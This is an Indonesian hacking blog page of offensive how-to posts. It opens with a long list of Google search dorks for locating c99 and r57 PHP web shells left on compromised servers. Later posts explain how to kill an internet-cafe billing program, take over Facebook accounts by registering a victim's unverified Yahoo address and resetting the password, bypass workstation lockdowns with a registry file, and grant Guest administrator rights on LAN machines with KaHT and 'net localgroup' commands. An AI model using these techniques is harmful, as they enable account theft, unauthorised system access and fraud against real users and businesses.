c99shell v. 1.0 pre-release build
#16
--[ c99shell v. 1.0 pre-release build
#15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build
#16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP
brute Sec. SQL PHP-code Update
Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php
safe-mode: off (not secure)
drwxrwxrwx c99shell
inurl:c99.txt
inurl:c99.php uid=0(root)
root c99.php
“Captain Crunch Security Team”
inurl:c99
download c99.php
inurl:c99.php
allinurl: c99.php
allinurl: c99.txt
inurl:”/c99.php”
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
inurl:”/c99.php”
c99 shell v.1.0 (roots)
allintitle: “c99shell”
inurl:”c99.php
allinurl: “c99.php”
intitle:C99Shell v. 1.0 pre-release
+uname
intitle:C99Shell v. 1.0 pre-release
+uname
allinurl: “c99.php”
inurl:”c99.php”
inurl:”c99.php”
inurl:”c99.php” c99shell
inurl:”c99.php”
inurl:”/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:”c99.php”
inurl:”c99.php”
allinurl:c99.php?
“inurl:c99..php”
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
powered by Captain Crunch
Security Team
allinurl:c99.php
“c99.php” filetypehp
allinurl:c99.php
inurl:c99shell.php
allinurl:.c99.php
“inurl:c99.php”
c99. PHP-code Feedback Self
remove
allinurl:c99.php
download c99.txt
inurl:c99shell.txt
allinurl: “c99.php”
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release
+uname
allinurl:”c99.php”
inurl:c99.php
safe-mode: off (not secure)
drwxrwxrwx c99shell
inurl:/c99.php
inurl:”c99.php”
inurl:c99.php
c99.php download
inurl:”c99.php”
inurl:/c99.php
inurl:”c99.php?”
files/c99.php
c99shell filetypehp -echo
c99shell powered by admin
inurl:”c99.php”
inurl:c99.php uid=0(root)
inurl:”c99.php”
inurl:”/c99.php” intitle:”C99shell”
C99Shell v. 1.0 pre-release build
#5
inurl:c99.php
–[ c99shell v. 1.0 pre-release build
#16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
!c99shell v. 1+Safe-mode: OFF (not
secure)
"C99Shell v. 1.0 pre-release build
"
intitle:c99shell +filetypehp
intitle:C99Shell v. 1.0 pre-release
+uname
"Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
intitle:!C99Shell v. 1.0 pre-release
build #16! root
!C99Shell v. 1.0 pre-release build
#5!
C99Shell v. 1.0 pre-release build
#16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-
release build #12
c99shell v. 1.0 pre-release build
#16
--[ c99shell v. 1.0 pre-release build
#15 | Powered by ]–
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
“c99shell v 1.0?
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build
#16 download
intitle:c99shell “Software: Apache”
allinurl: c99.php
allintext: Encoder Tools Proc. FTP
brute Sec. SQL PHP-code Update
Feedback Self remove
Logout
powered by Captain Crunch
Security Team
!C99Shell v. 1.0 pre-release build
#5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch
Security Team
C99Shell v. 1.0 pre-release build
#16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch
Security Team
!C99Shell v. 1.0 pre-release build
#5!
intitle:”c99shell” filetypehp root
intitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-
release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch
Security Team
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
inurl:/c99.php?
intitle:C99Shell pre-release
powered by Captain Crunch
Security Team
C99Shell v. 1.0 pre-release build
#16!
C99Shell v. 1.0 pre-release build
#16 administrator
intitle:c99shell filetypehp
powered by Captain Crunch
Security Team
powered by Captain Crunch
Security Team
C99Shell v. 1.0 pre-release build
#12
c99shell v.1.0
“c99shell v. 1.0 pre-release build”
inurl:”c99.php” filetypehp
“c99shell v. 1.0 “
ok c99.php
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
c99shell v. 1.0 pre-release build
#16 |
!C99Shell v. 1.0 pre-release build
#5!
!C99Shell v. 1.0 pre-release build
#5!
powered by Captain Crunch
Security Team
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
powered by Captain Crunch
Security Team
C99Shell v. 1.0 pre-release
inurl:c99.php exthp
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
powered by Captain Crunch
Security Team
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout”
C99Shell v. 1.0 pre-release build
#16 software apache
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
“c99shell v 1.0?
allintitle: C99shell filetypehp
C99Shell v. 1.0 pre-release build
#16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build
#5
allinurl:”c99.php” filetypehp
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
!C99Shell v. 1.0 pre-release build
#16!
intitle:C99Shell v. 1.0 pre-release
+uname
c99shell v. 1.0
–[ c99shell v. 1.0 pre-release build
#16 powered by Captain Crunch
Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build
#16 powered by Captain Crunch
Security Team | ]–
!C99Shell v. 1.0 pre-release build
#5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec.
SQL PHP-code Update Feedback Self
remove Logout
intitle:c99shell filetypehp
“Encoder Tools Proc. FTP brute”
“c99? filetypehp intext:”Safe-Mode:
OFF”
c99shell v. 1.0 pre
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of “
c99.php “intitle:Index of “
c99.php “intitle:Index of “
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php

Tambahan

"Shell" filetype:php intext:"uname -a:" "EDT 2010"

intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]

inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update


Silakan Sobat Coba satu persatu, Jika sobat tidak menemukannya mungkin anda kurang beruntung dan kadang juga pengaruh face...  :D
Kalau Saya Sich sekitar 70%  Berhasil, wkwkwkwkkw.....


Slamat mencoba sob jangan lupa baca juga jampe-jampe nya biar tititititit........
Read More --►

Saturday, 26 October 2013

Ebook Web Hacking Attacks and Defense

Ebook Hacking Website + Cara Mengatasinya

Dengan membaca ebook ini, akan terlihat jelas bagaimana cara mendeface dan cara pengamanannya bila Website anda di serang juga. Buah karya seorang Hacker, yaitu S. McClure, Saumil Shah dan Shreeraj Shah, Sangat bagus dan jelas
Di lengkapi juga ilustrasi Topologi Jaringan..
1 Kata Untuk Ebook Ini, WAJIB DI OWNLOAD & Sangat Bermanfaat! :)
Download 1
Download 2
Selamat belajar & selamat berjuang.. :)
Read More --►

Sunday, 1 September 2013

Cara hack billing warnet dengan smadav

1.Pastikan Warnet target memakai anti virus smadav dan diwarnet kalian bisa pilih personal maupun paket

2.Ikuti cara berikut :
  • Buka smadav
  • pilih TOOLS
  • pilih PROCCES MANAGER
  • pilih Progam biling explorer "client008.exe"
  • klik kanan di client008.exe
  • pilih suspend/ kill 
  • klik ok
  • taraaaa mat berinternet sepuasnya coy :D
3.anda bisa melihat bahwa waktu billing akan "pending/berhenti/hilang". Nah bagaimana cara melanjutkannya? Mudah cukup melakukannya seperti di atas namun pada pilihan action > klik resume aja.
sekian dulu dari saya tentang Cara hack billing warnet dengan smadav.
trik ini hanya pembelajaran saja, jangan disalahgunakan.
Read More --►

Tuesday, 27 August 2013

Tutorial Network Hack Course


bingung ngga tau  mau share apa wkwkwkw.. pilih prah pilih dpt ...

dan ini aja deh...

Tutorial Network Hack Course

1. Introduction to Information Security & Ethical Hacking

2. Basics of Networking (Tutorial for beginners)

3. Introduction

4. Hacker Vs Cracker

5. Ethical Hacking

6. Precautions

7. Current Cyber Threats

8. Desktop and Server Security

9. Windows Security

10. Hacking into Windows XP, NT

11. SAM (Security Accounts Manager)

12. Registries

13. Counter Measures

14. Linux Security

15. Hacking into Linux

16. Keyloggers - Hardware & Software

17. Anti Keyloggers

18. Trojans or Remote Administration Tools

19. Spywares

20. Viruses and Worms Introduction

21. Classification of Viruses and Worms

22. Examples of Viruses and Worms

23. Countermeasures

24. Anti Virus

25. LAN Security

26. Threats to LAN

27. Countermeasures

28. Network and File Sharing

29. Firewalls

30. Anti Virus

31. Anti Spywares

32. Network Scanners

33. Introduction to Firewalls

34. Working of a Firewall

35. Types of Firewalls

36. Packet Filters

37. Proxy Gateways

38. Network Address Translation

39. Intrusion Detection

40. Logging

41. Network Tools and Commands (Tutorial)

42. TCP/IP Commands

43. ARP Command

44. Trace route Command

45. Netstat Command

46. Finger Command

47. Ping Command

48. Nbtstat Command

49. Ipconfig Command

50. Telnet Command



-

CD 2 Contents:

-



1. Internet Security

2. IP Addresses

3. Finding an IP Address

4. Through Instant Messaging Software

5. Through Internet Relay Chat

6. Through Website

7. Through Email Headers

8. Through Message Board Postings

9. Proxies Servers

10. Transparent Proxies

11. Anonymous Proxies

12. Distorting Proxies

13. Elite Proxies

14. Free Proxy Servers

15. Analysis of Email Headers

16. Yahoo Email

17. Google Email

18. SSL (Secure Sockets Layer)

19. IP Spoofing

20. Information Gathering for a Remote System

21. Daemon Grabbing

22. Port Scanning

23. ICMP Messages

24. Banner Grabbing

25. Sockets

26. Detection of TCP Port Scan TCP SYN Scanning

27. Detection of SYN Scans

28. SYN/ACK Scanning

29. Detection of SYN/ACK Port Scan

30. TCP FIN Scanning

31. TCP XMAS tree scanning

32. ACK Scanning

33. UDP Ports

34. Utility

35. Fingerprinting

36. OS Fingerprinting

37. Remote OS Fingerprinting

38. Attacking the System

39. Nontechnical Attacks

40. Network Infrastructure Attacks

41. Operating System Attacks

42. Technical Attacks

43. Denial of Services attacks (DOS Attacks)

44. Threat from Sniffing and Key Logging

45. Trojan Attacks

46. HTTP Request Smuggling g

47. IP Spoofing

48. Cross site scripting (XSS)

49. Buffer Overflows

50. Format Bugs

51. SQL Injection s

52. Input Validation

53. Viruses & Worms

54. Spy Ware Software

55. Password Cracking

56. All other types of Attacks

57. Password Cracking

58. Password Guessing

59. Dictionary Based Attacks

60. Brute-Force Attacks

61. Default Passwords

62. Attacks on LOG files

63. Sniffer Attacks

64. Wireless & Bluetooth Security (Tutorial only) (Introduction Only )

65. Penetration Testing

66. Definition

67. Methodology

68. Basic Approaches

69. Google Hacking

70. Terminologies

71. Basic Search Techniques

72. Basic Keyword searching

73. Phrase search

74. + Operator search

75. - Operator search

76. Range search

77. Advanced Search Techniques Site

78. Intitle, allintitle

79. Inurl, allinurl

80. Link .

81. Phonebook

82. Rphonebook

83. Bphonebook

84. Daterange

85. Cache

86. Filetype .

87. Robots.txt

-

CD 3 Contents:
-

1. Encryption & Cryptography (Introduction Only )

2. Introduction to Cryptography

3. Private Key Encryption

4. Public Key Encryption

5. DES Algorithm

6. RSA Algorithm

7. Hash Functions

8. MD5 HASH algorithm

9. Digital Signatures

10. Encyptorsetup

11. Computer Forensics (Introduction Only )

12. Introduction to Forensics

13. Digital Evidence

14. Requirements for Forensics

15. Steps taken in Forensics investigation

16. Acquisition

17. Identification

18. Evaluation

19. Presentation

20. Forensic Toolkit

21. Steganography and Data Hiding

22. Introduction

23. Digital Watermarking

24. Types of Steganography

25. In band Data Insertion

26. Data Algorithmic

27. Overt based grammar

28. Out-band Data Insertion

29. Overwriting Data Insertion

30. Steganography Tools & Applications

31. Catching Criminals

32. Cyber Terrorism

33. Forms of Cyber Terrorism

34. Factors & Reasons

35. Countermeasures

36. Challenges

37. Honey Pots

38. Definition

39. Research Honey Pots

40. Production Honey Pots

41. Low Involved Honey Pots

42. High Involved Honey Pots

43. Pros & Cons

44. Famous Honey Pots

45. Cyber Laws & IT Act India (Introduction Only )

46. IT Act 2000

47. Domain Name Disputes

48. Definitions and Laws

49. Cyber Crimes & penalties

50. Security Auditing (Introduction Only )

51. Audit Objectives

52. Risk Analysis

53. Auditing Steps

54. Previous Check

55. Planning & Organisation

56. Network Control - Policies / Stds

57. Network Control - Hardware / Software

58. Network Data Standards and Data Access

59. Hardware and Software Backup and Recovery

60. Software Communications

61. Access to Network Operating Systems Software and Facilities

62. Data Encryption and Filtering

63. Internet Applications

64. Password Protection

DOWNLOAD TUTORIAL FILE
http://adf.ly/2ITb4

http://adf.ly/2ITb5

http://adf.ly/2ITb6

http://adf.ly/2ITb7

http://adf.ly/2ITb8

tkhnz buat team surabayahackerlink.org

Read More --►

Tuesday, 20 August 2013

Hack Akun Facebook Terbaru 2013


Hacking, merupakan sebuah perbuatan seorang hacker yang bisa mendapatkan beberapa hak akses kepada sesuatu yang ia inginkan dengan cara yang ilegal. Hacking ini sangat digemari oleh para pengguna Facebook untuk mendapatkan hak akses memasuki akun Facebook temannya dengan beberapa tujuan, ada yang hanya sekedar iseng, balas dendam bahkan hanya ingin show off :p . Banyak sekali tutorial Hacking yang pernah saya bahas di blog ini. Diantara tutorial Hacking Facebook ada yang masih bisa digunakan yaitu dengan menggunakan Forgot Password dan Fake Login (udah susah cari mangsa). Kali ini saya akan memberikan tutorial Hacking Faceook dengan menggunakan TRIK campuran antara kelemahan si user dengan forgot password. 

Berikut tutorial Hacking Facebook yang saya dapatkan dari berbagai sumber..
  • Import Contact from Yahoo Mail!
Disini kita akan menyaring semua email yang terdapat pada akun facebook teman kita. Jadi, kita akan melihat semua email yang digunakkan oleh teman kita untuk login ke facebook.
  1.  Login ke akun Yahoo yang kamu miliki
  2.  Klik import email dan pilih yang bergambar Facebook
  3. Setelah muncul semua email teman Facebook kamu, pilihlah salah satu email Yahoo yang ada di deretan tersebut
  • Forgot Facebook Password - 1
Disini kita akan menggunakan email yahoo yang kita dapatkan dari imports contact Yahoo untuk berpura-pura sebagai user yang lupa akan password akun Facebook.

1. Pergilah ke forgot password Facebook, atau klik disini

2. Silahkan masukkan email korban yang kita dapatkan dari Yahoo imports contact

3. Lalu klik saya tidak mempunyai akses ke sini lagi? Lihat gambar
trik Hack Akun Facebook Terbaru 2013

Akan terdapat 2 kondisi setelah langkah 3 dilakukan, yang pertama kita diperintahkan untuk memasukkan email baru dan yang kedua yaitu terjadi error. Jika terjadi error maka email tersebut belom diverifikasi bahkan tidak terdaftar dalam Yahoo! Mail. Jika terjadi error lanjut ke langkah 4. Jika tidak terjadi error anda bisa lanjutkan dengan teknik Forgot Password yang ini.

4. Karena terjadi error, mungkin email tidak terverifikasi atau tidak pernah dibuat di Yahoo, inilah kesalahan user Facebook yang membuat akun Facebook tanpa email yang diverifikasi atau email yang tidak terdaftar dalam Yahoo Mail. to be continue...

Create 'Your' Yahoo Account!
Jika alamat Yahoo korban yang dijadikan untuk login Facebook tidak terdaftar dalam akun Yahoo, maka...BUATKANLAH DIA AKUN YAHOO! Buat lah sebuah email di yahoo dengan alamat korban yang anda dapatkan di imports contact Yahoo anda tadi atau yang anda masukkan dalam forgot password tadi. Kalau anda sudah membuat emailnya, maka anda adalah sama dengan yang punya akun facebook tersebut/senasib dan seperjuangan ckckckck!

  • Forgot Facebook Password - 2
Apa yang anda harus lakukan jika anda lupa dengan password akun Facebook anda? Anda akan meminta password yang baru dengan cara seperti Forgot Facebook Password - 1 di atas. Hanya saja pada langkah ketiga kita ganti dengan mengklik Atur Ulang Kata Sandi. Setelah itu silahkan buka email yang baru kita buat, selamat anda menerima link untuk membuat kata sandi Facebook korban :)

Trik ini saya dapatkan dari beberapa sumber yang ada di google dan sudah saya coba dengan tangan saya sendiri, dan hasilnya 70%  berhasil, maaf bukanya saya menggurui atau apalah. tapi saya hanya ingin berbagi trik yang saya dapatkan ini dengan teman-teman sobat blogger. dan trik tersebut saya anggap logis, karena trik tersebut memanfaatkan kelalaian user yang tidak memverifikasi emailnya dan bahkan tidak memakai email yang valid atau tidak terdaftar dalam Yahoo mail. Terimakasih dan cukup sekian trik hack akun terbaru 2013 kali ini mudah-mudahan kita bisa berjumpa lagi di trik yang akan datang di 2014 hahahaha... tenang aja coy blog ane di update tiap hari ko 1 x 24 jam nonstop (ngga pake tidur) wkwkwkw....
buat sobat blogger mungkin ada yang ingin ditanyakan? silakan di tanyakan di kotak komentar yang telah saya sediakan di blog ini, dan jangan lupa untuk join juga di grub kami
CyBer®Bintauna-info Blog ini Fans Page Kami Çýßèrßìñtåüñå karna disana juga ada banyak teman-teman yang sudah memakai trik ini dan berhasil.

slamat mencoba sob semoga bermanfaat.....
Read More --►

Wednesday, 14 August 2013

Cara Mengetahui IP Address Komputer Orang Lain


Yap.. Melacak Ip Address Komputer Orang ini sangatlah dicari-cari oleh orang sedunia. Maka dari itu Cyberbintauna akan membahas secara detail. Langsung aja ke TKP.
 

Disini akan dibahas :
1. Melacak alamat IP suatu situs
2. Melacak Real Adress server suatu situs
3. Cara Mengetahui IP address lawan chatting kita

-== Pembahasan ===-

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING -WWW.SITUS-YANG-DILACAK.COM- lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka http://www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di http://www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Tutorial Hacker Part 2 :

A. Melacak ip addreas di yahoo Mesengger dan mesengger lainnya 

Banyak yang tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.
 Segera buka MS-DOS anda, lalu ketikkan netstat -n
lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

B. Cara masuk ke DOS pada Windows XP yang serba dikunci 

Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties
2. Di properties pilihlah find target
3. Muncul Window lalu pilih search diatas
4. Pada Search pilihlah "All Files and folders"
5. Lalu cari file "cmd.exe" di windows
6. Jika di temukan maka jalankan file cmd.exe.
7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata
penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

C. Menembus fasilitas umum windows yang terlalu dibatasi 

Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word
2.Lalu ketik dibawah ini
REGEDIT4
[HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows \""CurrentVersion\""Policies\""Explorer] "NoRun"=dword:00000000
3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.

D. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) 

Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

1. Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

2. Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer
sumber : kaskus.us
Read More --►

Friday, 26 July 2013

CARA DECRYPT MD5 DENGAN CAIN & ABEL

Kawan2, Ditengah kesibukan saya. Saya akan sedikit meluangkan waktu untuk selalu membagikan ilmu yang saya punya. Disini saya ingin membagikan sedikit cara tentang bagaimana mendecrypt MD5 dengan software Cain&Abel.
Tanpa banyak basa-basi,langsung aja kita ke tkp gan.
1. Yang belum mempunyai software CainAbel silahkan download diSINI
2. Instal CainAbel di komputer anda.
3. Buka CainAbel.
4. Pilih Cracker lalu MD5 Hashes. Lihat gambar berikut.
1
5. Klik 1X pada bagian jendela yang kosong.
6. Klik tanda tambah (+). Lihat gambar berikut.
1
*Klik tanda tambah (+) tersebut dan akan keluar kotak MD5.
 1
Masukan Code MD5 yang ingin anda decrypt lalu klik OK.

7. Setelah itu klik kanan pada kode MD5 tadi dan pilih Brute-Force Attack. Lihat gambar berikut.1


8. Klik Start dan tunggu hasilnya akan keluar.1
Okey, sedikit trik sederhana dari saya semoga dapat membantu kawan-kawan sekalian.


Pesan saya: "Jangan pernah lelah untuk belajar, karena dunia kita adalah dunia berfikir tanpa batas yang dituntut untuk terus belajar dan belajar".

Read More --►

Thursday, 25 July 2013

Mencari Password Website Melalui Google

kali ini çýßèrßìñtåüñå - ìñfõ ßlõg akan sharing tentang hacking dengan bantuan Google, yaitu mendapatkan password yang bisa berguna untuk hack website :D
hack, mencari password dengan google, hack password, hack password leat google, google dork untuk hacking, hack dengan google dork, kumpulan google dork


langsung aja yuk, check this on

Pertama, Anda bisa mencari dari :
1. Iklan Google yang ada di semua situs, hasilnya akan sama saja.
2. Tombol Google search yang ada di toolbar.
3. Google main search Engine : http://www.google.com

Selanjutnya agar pencarian bisa paling mendekati keinginan Anda, ikuti tips berikut :

Dibawah   ini akan dijelaskan tentang perintah khusus pada Google, dan akan   dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk   mendapatkan informasi tersembunyi dan sangat penting.

"Intitle:"   ialah sintaks perintah untuk membatasi pencarian yang hanya   menghasilkan judul yang mengandung informasi pada topik yangdimaksud.   Sebagai contoh pada pencarian, “intitle:password admin “ ( tanpa tanda   kutip ). Pencarian akan mencari page yang mengandung kata “ password “   sebagai judulnya dengan prioritas utama “admin” .Jika pada pencarian   terdapat dua query pencarian utama, digunakan sintaks allintitle: untuk   pencarian secara lengkap. Sebagai contoh pada pencarian   “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek   utama judul yaitu “admin” dan “mdb”.

“inurl:” ialah sintaks   perintah untuk membatasi pencarian yang hanya menghasilkan semua URL   yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh   pencarian dalam pencarian,”inurl : database mdb”. Pencarian akan   menghasilkan semua URL yang hanya mengandung informasi tentang “database   mdb “.

Hal yang sama juga berlaku pada sintaks ini,  jika  terdapat dua query pencarian utama, digunakan sintaks “allinurl:”  untuk  mendapatkan list url tersebut. Sebagai contoh pencarian  “allinurl:  etc/passwd“ , pencarian akan menghasilkan URL yang  mengandung informasi  tentang “etc” dan “passwd”. Tanda garis miring  slash (“/”) diantara dua  kata etc dan passwd akan diabaikan oleh mesin  pencari Google.

>“site:”  ialah sintaks perintah untuk  membatasi pencarian suatu query informasi  berdasarkan pada suatu situs  atau domain tertentu. Sebagai contoh pada  pencarian informasi:  “waveguide site:itb.ac.id” (tanpa tanda kutip).  Pencarian akan mencari  topic tentang waveguide pada semua halaman yang  tersedia pada domain  itb.ac.id.

“cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google.

Sebagai contoh:

“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

“filetype:”   ialah sintaks perintah pada Google untuk pencarian data pada internet   dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh  pada  pencarian :

